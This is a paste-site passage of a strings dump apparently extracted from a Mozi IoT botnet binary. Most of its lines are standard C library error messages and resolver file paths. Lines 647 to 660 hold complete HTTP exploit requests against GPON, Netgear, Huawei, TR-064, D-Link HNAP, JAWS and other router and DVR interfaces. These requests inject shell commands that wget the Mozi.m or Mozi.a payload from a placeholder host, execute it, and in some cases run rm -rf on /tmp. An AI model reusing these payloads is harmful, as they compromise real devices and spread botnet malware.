  480. 0x470f0 14 13 /tmp/Moziusa/
  481. 0x47100 15 14 FILE NOT FOUND
  482. 0x47110 22 21 FILE ACCESS VIOLATION
  483. 0x47128 20 19 WRITE NOT PERMITTED
  484. 0x4713c 18 17 INVALID OPERATION
  485. 0x47150 20 19 NO FREE CONNECTIONS
  486. 0x4727e 16 7 \a\b\t\n\v\f\r
  487. 0x472b0 192 95  !"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~
  488. 0x47470 8 7 %s%s%m\n
  489. 0x474a0 6 5 (nil)
  490. 0x474bf 5 4 \b\n\n\n
  491. 0x474d0 9 8 hlLjztqZ
  492. 0x47510 21 20 npxXoudifFeEgGaACScs
  493. 0x47528 8 7  +0-#'I
  494. 0x47567 8 7 \a\b\t\n\v\f\r
  495. 0x47580 10 9  !"-N.Y]Z
  496. 0x4758a 17 16 #$%&'()*+,234567
  497. 0x4759b 42 41 ;<=>?@ABCDEFGJIMOPQRSTUVWX[\\^_`abcxyz{|}~
  498. 0x475e0 15 14 Unknown error
  499. 0x475f0 8 7 Success
  500. 0x475f8 24 23 Operation not permitted
  501. 0x47610 26 25 No such file or directory
  502. 0x4762a 16 15 No such process
  503. 0x4763a 24 23 Interrupted system call
  504. 0x47652 19 18 Input/output error
  505. 0x47665 26 25 No such device or address
  506. 0x4767f 23 22 Argument list too long
  507. 0x47696 18 17 Exec format error
  508. 0x476a8 20 19 Bad file descriptor
  509. 0x476bc 19 18 No child processes
  510. 0x476cf 33 32 Resource temporarily unavailable
  511. 0x476f0 23 22 Cannot allocate memory
  512. 0x47707 18 17 Permission denied
  513. 0x47719 12 11 Bad address
  514. 0x47725 22 21 Block device required
  515. 0x4773b 24 23 Device or resource busy
  516. 0x47753 12 11 File exists
  517. 0x4775f 26 25 Invalid cross-device link
  518. 0x47779 15 14 No such device
  519. 0x47788 16 15 Not a directory
  520. 0x47798 15 14 Is a directory
  521. 0x477a7 17 16 Invalid argument
  522. 0x477b8 30 29 Too many open files in system
  523. 0x477d6 20 19 Too many open files
  524. 0x477ea 31 30 Inappropriate ioctl for device
  525. 0x47809 15 14 Text file busy
  526. 0x47818 15 14 File too large
  527. 0x47827 24 23 No space left on device
  528. 0x4783f 13 12 Illegal seek
  529. 0x4784c 22 21 Read-only file system
  530. 0x47862 15 14 Too many links
  531. 0x47871 12 11 Broken pipe
  532. 0x4787d 33 32 Numerical argument out of domain
  533. 0x4789e 30 29 Numerical result out of range
  534. 0x478bc 26 25 Resource deadlock avoided
  535. 0x478d6 19 18 File name too long
  536. 0x478e9 19 18 No locks available
  537. 0x478fc 25 24 Function not implemented
  538. 0x47915 20 19 Directory not empty
  539. 0x47929 34 33 Too many levels of symbolic links
  540. 0x4794c 27 26 No message of desired type
  541. 0x47967 19 18 Identifier removed
  542. 0x4797a 28 27 Channel number out of range
  543. 0x47996 25 24 Level 2 not synchronized
  544. 0x479af 15 14 Level 3 halted
  545. 0x479be 14 13 Level 3 reset
  546. 0x479cc 25 24 Link number out of range
  547. 0x479e5 29 28 Protocol driver not attached
  548. 0x47a02 27 26 No CSI structure available
  549. 0x47a1d 15 14 Level 2 halted
  550. 0x47a2c 17 16 Invalid exchange
  551. 0x47a3d 27 26 Invalid request descriptor
  552. 0x47a58 14 13 Exchange full
  553. 0x47a66 9 8 No anode
  554. 0x47a6f 21 20 Invalid request code
  555. 0x47a84 13 12 Invalid slot
  556. 0x47a92 21 20 Bad font file format
  557. 0x47aa7 20 19 Device not a stream
  558. 0x47abb 18 17 No data available
  559. 0x47acd 14 13 Timer expired
  560. 0x47adb 25 24 Out of streams resources
  561. 0x47af4 30 29 Machine is not on the network
  562. 0x47b12 22 21 Package not installed
  563. 0x47b28 17 16 Object is remote
  564. 0x47b39 22 21 Link has been severed
  565. 0x47b4f 16 15 Advertise error
  566. 0x47b5f 14 13 Srmount error
  567. 0x47b6d 28 27 Communication error on send
  568. 0x47b89 15 14 Protocol error
  569. 0x47b98 19 18 Multihop attempted
  570. 0x47bab 19 18 RFS specific error
  571. 0x47bbe 12 11 Bad message
  572. 0x47bca 38 37 Value too large for defined data type
  573. 0x47bf0 27 26 Name not unique on network
  574. 0x47c0b 29 28 File descriptor in bad state
  575. 0x47c28 23 22 Remote address changed
  576. 0x47c3f 39 38 Can not access a needed shared library
  577. 0x47c66 37 36 Accessing a corrupted shared library
  578. 0x47c8b 32 31 .lib section in a.out corrupted
  579. 0x47cab 48 47 Attempting to link in too many shared libraries
  580. 0x47cdb 38 37 Cannot exec a shared library directly
  581. 0x47d01 50 49 Invalid or incomplete multibyte or wide character
  582. 0x47d33 44 43 Interrupted system call should be restarted
  583. 0x47d5f 19 18 Streams pipe error
  584. 0x47d72 15 14 Too many users
  585. 0x47d81 31 30 Socket operation on non-socket
  586. 0x47da0 29 28 Destination address required
  587. 0x47dbd 17 16 Message too long
  588. 0x47dce 31 30 Protocol wrong type for socket
  589. 0x47ded 23 22 Protocol not available
  590. 0x47e04 23 22 Protocol not supported
  591. 0x47e1b 26 25 Socket type not supported
  592. 0x47e35 24 23 Operation not supported
  593. 0x47e4d 30 29 Protocol family not supported
  594. 0x47e6b 41 40 Address family not supported by protocol
  595. 0x47e94 23 22 Address already in use
  596. 0x47eab 32 31 Cannot assign requested address
  597. 0x47ecb 16 15 Network is down
  598. 0x47edb 23 22 Network is unreachable
  599. 0x47ef2 36 35 Network dropped connection on reset
  600. 0x47f16 33 32 Software caused connection abort
  601. 0x47f37 25 24 Connection reset by peer
  602. 0x47f50 26 25 No buffer space available
  603. 0x47f6a 40 39 Transport endpoint is already connected
  604. 0x47f92 36 35 Transport endpoint is not connected
  605. 0x47fb6 46 45 Cannot send after transport endpoint shutdown
  606. 0x47fe4 35 34 Too many references: cannot splice
  607. 0x48007 21 20 Connection timed out
  608. 0x4801c 19 18 Connection refused
  609. 0x4802f 13 12 Host is down
  610. 0x4803c 17 16 No route to host
  611. 0x4804d 30 29 Operation already in progress
  612. 0x4806b 26 25 Operation now in progress
  613. 0x48085 22 21 Stale NFS file handle
  614. 0x4809b 25 24 Structure needs cleaning
  615. 0x480b4 28 27 Not a XENIX named type file
  616. 0x480d0 30 29 No XENIX semaphores available
  617. 0x480ee 21 20 Is a named type file
  618. 0x48103 17 16 Remote I/O error
  619. 0x48114 20 19 Disk quota exceeded
  620. 0x48128 16 15 No medium found
  621. 0x48138 18 17 Wrong medium type
  622. 0x4814a 28 27 File locking deadlock error
  623. 0x481b4 17 16 0123456789abcdef
  624. 0x48200 25 24 %u.%u.%u.%u.in-addr.arpa
  625. 0x4821c 7 6 %x.%x.
  626. 0x48224 9 8 ip6.arpa
  627. 0x484c0 10 9 /dev/null
  628. 0x4885d 5 4 O8M2
  629. 0x48884 8 7 hlLjztq
  630. 0x48898 23 22 npxXoudifFeEgGaACSncs[
  631. 0x488d7 9 8 \n\n\n\n\n\n\n\n
  632. 0x488e0 6 5 (nil)
  633. 0x488eb 8 7 nfinity
  634. 0x48920 14 13 /etc/services
  635. 0x4893c 17 16 /etc/resolv.conf
  636. 0x48950 24 23 /etc/config/resolv.conf
  637. 0x48968 11 10 nameserver
  638. 0x48974 7 6 domain
  639. 0x4897c 7 6 search
  640. 0x48995 10 9 \ninfinity
  641. 0x489b0 11 10 /etc/hosts
  642. 0x489bc 18 17 /etc/config/hosts
  643. 0x89181 11 10 \nvr8^T:l)U
  644. 0x8918f 5 4 U8*T
  645. 0x891bc 7 4 ホア`\n8
  646. 0x891d7 5 4 ]o,&
  647. 0x89268 312 311 POST /GponForm/diag_Form?images/ HTTP/1.1\r\nHost: 127.0.0.1:8080\r\nConnection: keep-alive\r\nAccept-Encoding: gzip, deflate\r\nAccept: */*\r\nUser-Agent: Hello, World\r\nContent-Length: 118\r\n\r\nXWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=``;wget+http://%s:%d/Mozi.m+-O+->/tmp/gpon8080;sh+/tmp/gpon8080&ipv=0
  648. 0x89a7c 306 305 POST /GponForm/diag_Form?images/ HTTP/1.1\r\nHost: 127.0.0.1:80\r\nConnection: keep-alive\r\nAccept-Encoding: gzip, deflate\r\nAccept: */*\r\nUser-Agent: Hello, World\r\nContent-Length: 118\r\n\r\nXWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=``;wget+http://%s:%d/Mozi.m+-O+->/tmp/gpon80;sh+/tmp/gpon80&ipv=0
  649. 0x8a290 864 863 POST /picsdesc.xml HTTP/1.1\r\nContent-Length: 630\r\nAccept-Encoding: gzip, deflate\r\nSOAPAction: urn:schemas-upnp-org:service:WANIPConnection:1#AddPortMapping\r\nAccept: /\r\nUser-Agent: Hello-World\r\nConnection: keep-alive\r\n\r\n<?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope//" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:AddPortMapping xmlns:u="urn:schemas-upnp-org:service:WANIPConnection:1"><NewRemoteHost></NewRemoteHost><NewExternalPort>47450</NewExternalPort><NewProtocol>TCP</NewProtocol><NewInternalPort>44382</NewInternalPort><NewInternalClient>cd /var/; wget http://%s:%d/Mozi.m; chmod +x Mozi.m; ./Mozi.m</NewInternalClient><NewEnabled>1</NewEnabled><NewPortMappingDescription>syncthing</NewPortMappingDescription><NewLeaseDuration>0</NewLeaseDuration></u:AddPortMapping></s:Body></s:Envelope>\r\n\r\n
  650. 0x8aaa4 163 162 GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://%s:%d/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0\r\n\r\n
  651. 0x8b2b8 163 162 GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://%s:%d/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0\r\n\r\n
  652. 0x8bacc 788 787 POST /ctrlt/DeviceUpgrade_1 HTTP/1.1\r\nHost: %s:37215\r\nContent-Length: 601\r\nConnection: keep-alive\r\nAuthorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"\r\n\r\n<?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g %s:%d -l /tmp/huawei -r /Mozi.m;chmod -x huawei;/tmp/huawei huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
  653. 0x8c2e0 789 788 POST /UD/act?1 HTTP/1.1\r\nHost: 127.0.0.1:7574\r\nUser-Agent: Hello, world\r\nSOAPAction: urn:dslforum-org:service:Time:1#SetNTPServers\r\nContent-Type: text/xml\r\nContent-Length: 640\r\n\r\n<?xml version="1.0"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><SOAP-ENV:Body><u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1&qu ot;><NewNTPServer1>`cd /tmp && rm -rf * && /bin/busybox wget http://%s:%d/Mozi.m && chmod 777 /tmp/tr064 && /tmp/tr064 tr064`</NewNTPServer1><NewNTPServer2>`echo DEATH`</NewNTPServer2><NewNTPServer3>`echo DEATH`</NewNTPServer3><NewNTPServer4>`echo DEATH`</NewNTPServer4><NewNTPServer5>`echo DEATH`</NewNTPServer5></u:SetNTPServers></SOAP-ENV:Body></SOAP-ENV:Envelope>
  654. 0x8caf4 789 788 POST /UD/act?1 HTTP/1.1\r\nHost: 127.0.0.1:5555\r\nUser-Agent: Hello, world\r\nSOAPAction: urn:dslforum-org:service:Time:1#SetNTPServers\r\nContent-Type: text/xml\r\nContent-Length: 640\r\n\r\n<?xml version="1.0"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><SOAP-ENV:Body><u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1&qu ot;><NewNTPServer1>`cd /tmp && rm -rf * && /bin/busybox wget http://%s:%d/Mozi.m && chmod 777 /tmp/tr064 && /tmp/tr064 tr064`</NewNTPServer1><NewNTPServer2>`echo DEATH`</NewNTPServer2><NewNTPServer3>`echo DEATH`</NewNTPServer3><NewNTPServer4>`echo DEATH`</NewNTPServer4><NewNTPServer5>`echo DEATH`</NewNTPServer5></u:SetNTPServers></SOAP-ENV:Body></SOAP-ENV:Envelope>
  655. 0x8d308 769 768 POST /HNAP1/ HTTP/1.0\r\nHost: %s:80\r\nContent-Type: text/xml; charset="utf-8"\r\nSOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://%s:%d/Mozi.m && chmod 777 /tmp/Mozi.m && /tmp/Mozi.m`\r\nContent-Length: 640\r\n\r\n<?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>\r\n\r\n
  656. 0x8db1c 148 147 GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://%s:%d/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0\r\n\r\n
  657. 0x8e330 247 246 GET /shell?cd+/tmp;rm+-rf+*;wget+http://%s:%d/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1\r\nUser-Agent: Hello, world\r\nHost: %s:80\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\r\nConnection: keep-alive\r\n\r\n
  658. 0x8eb44 898 897 POST /soap.cgi?service=WANIPConn1 HTTP/1.1\r\nHost: %s:49152\r\nContent-Length: 630\r\nAccept-Encoding: gzip, deflate\r\nSOAPAction: urn:schemas-upnp-org:service:WANIPConnection:1#AddPortMapping\r\nAccept: */*\r\nUser-Agent: Hello, World\r\nConnection: keep-alive\r\n\r\n<?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><SOAP-ENV:Body><m:AddPortMapping xmlns:m="urn:schemas-upnp-org:service:WANIPConnection:1"><NewPortMappingDescription><NewPortMappingDescription><NewLeaseDuration></NewLeaseDuration><NewInternalClient>`cd /tmp;rm -rf *;wget http://%s:%d/Mozi.m;/tmp/Mozi.m dlink`</NewInternalClient><NewEnabled>1</NewEnabled><NewExternalPort>634</NewExternalPort><NewRemoteHost></NewRemoteHost><NewProtocol>TCP</NewProtocol><NewInternalPort>45</NewInternalPort></m:AddPortMapping><SOAPENV:Body><SOAPENV:envelope>\r\n\r\n
  659. 0x8f358 116 115 GET /cgi-bin/;cd${IFS}/var/tmp;rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://%s:%d/Mozi.m;${IFS}sh${IFS}/var/tmp/Mozi.m
  660. 0x8fb6c 98 97 GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://%s:%d/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcron
  661. 0x9037c 27 26 192.168.1.1:1234:1235:1235
  662. 0x9039e 24 23 192.168.3.1:123:124:125
  663. 0x90a24 12 11 192.168.1.1
  664. 0x90a58 12 11 192.168.1.1
  665. 0x90a8c 12 11 192.168.1.1
  666. 0x90e38 19 18 123888d1:ad2:id2bo
  667. 0x90e4c 7 6 888888
  668. 0x91220 27 26 192.168.1.1:1234:1235:1235
  669. 0x91242 24 23 192.168.3.1:123:124:125
  670. 0x918c8 12 11 192.168.1.1
  671. 0x918fc 12 11 192.168.1.1
  672. 0x91930 12 11 192.168.1.1
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!